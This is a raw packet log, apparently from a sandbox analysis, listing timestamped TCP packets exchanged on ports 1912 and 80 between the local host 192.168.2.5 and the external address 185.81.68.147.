                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.296880960 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297091007 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297144890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297146082 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297192097 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297245979 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297261000 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297497034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.297554970 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415369034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415412903 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415440083 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415467024 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415493965 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415551901 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415580034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415612936 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415638924 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415647984 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415647984 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415647984 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415666103 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.415791035 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416105032 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416157007 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416167021 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416184902 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416217089 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416239023 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416244030 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416291952 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416297913 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416596889 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416625023 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416673899 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.416673899 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417165041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417192936 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417220116 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417243958 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417248011 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417273998 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417282104 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417294025 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417335033 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417449951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417476892 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417505980 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.417536974 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535651922 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535684109 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535723925 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535752058 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535764933 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535782099 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535800934 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535862923 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.535878897 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536024094 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536051035 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536123037 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536187887 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536345005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536432028 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536561012 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536597013 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536638975 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537051916 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537123919 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537133932 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537322044 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537427902 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537504911 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.655870914 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656016111 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656061888 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656115055 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656128883 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656193018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656224966 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656232119 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656266928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656294107 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656296968 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656394005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656521082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656595945 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656691074 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656753063 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656910896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656982899 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657133102 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657188892 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657402039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657461882 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657485008 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657543898 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.699245930 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.699692011 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.759691954 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.759851933 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.760735035 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.760735035 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776508093 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776540041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776551962 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776591063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776602030 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776740074 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776784897 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776887894 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776889086 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776961088 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776966095 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776999950 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777060032 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777065039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777117014 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777131081 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777179003 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777229071 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777298927 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777321100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777369976 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777379036 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777426004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.863368988 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.863719940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.864722967 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.880539894 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897135019 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897176027 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897219896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897232056 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897249937 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897430897 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897475958 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897492886 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897597075 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897645950 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897675037 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897707939 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897716999 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897763968 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897799015 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897850037 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897862911 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897912979 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897970915 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897999048 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898031950 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898035049 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898066044 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898092985 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.984636068 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.984889030 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.985049963 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017554045 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017730951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017776966 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017790079 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017878056 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017880917 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017911911 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018042088 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018090963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018295050 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018392086 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018419981 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018537998 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018599987 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018699884 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018855095 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018882990 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.018914938 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.059258938 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.105545998 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.106182098 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.138097048 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.138138056 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.138165951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.226289988 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.457890987 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.460143089 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.579957008 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.895530939 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.942532063 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.130578041 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.250757933 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.444749117 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.444880009 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.444941998 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.446131945 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.552484035 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.565906048 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.565975904 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.566407919 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.672447920 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.672528982 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.672574043 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.686187983 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.792532921 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.792589903 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:33.912396908 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:34.001465082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:34.002387047 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:34.122168064 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:34.438055038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:34.479473114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.293963909 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.294039011 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.297534943 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.298609018 CET4975880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.418431997 CET8049758185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.428735018 CET4976480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.548744917 CET8049764185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.548841000 CET4976480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.549963951 CET4976480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.669698000 CET8049764185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.669776917 CET4976480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:35.790669918 CET8049764185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.168206930 CET8049764185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.168288946 CET8049764185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.168420076 CET4976480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.169591904 CET4976480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.271112919 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.289277077 CET8049764185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.390923977 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.391010046 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.391105890 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.510771990 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.510855913 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:37.630630970 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.860551119 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.860635996 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.860683918 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.862121105 CET4976980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.974138975 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:38.981798887 CET8049769185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.093842983 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.093947887 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.094008923 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.213887930 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.213953972 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:39.333823919 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.571070910 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.571110964 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.571168900 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.572475910 CET4977180192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.679467916 CET4977780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.692200899 CET8049771185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.799540043 CET8049777185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.799632072 CET4977780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.799694061 CET4977780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.919614077 CET8049777185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:40.922614098 CET4977780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:41.042484045 CET8049777185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.402677059 CET8049777185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.402714014 CET8049777185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.402853012 CET4977780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.404087067 CET4977780192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.505944967 CET4978380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.523809910 CET8049777185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.625775099 CET8049783185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.625868082 CET4978380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.625920057 CET4978380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.745749950 CET8049783185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.745816946 CET4978380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:42.865614891 CET8049783185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.083803892 CET8049783185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.083971977 CET8049783185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.084048986 CET4978380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.088362932 CET4978380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.192971945 CET4978980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.208184958 CET8049783185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.312815905 CET8049789185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:44.312907934 CET4978980192.168.2.5185.81.68.147
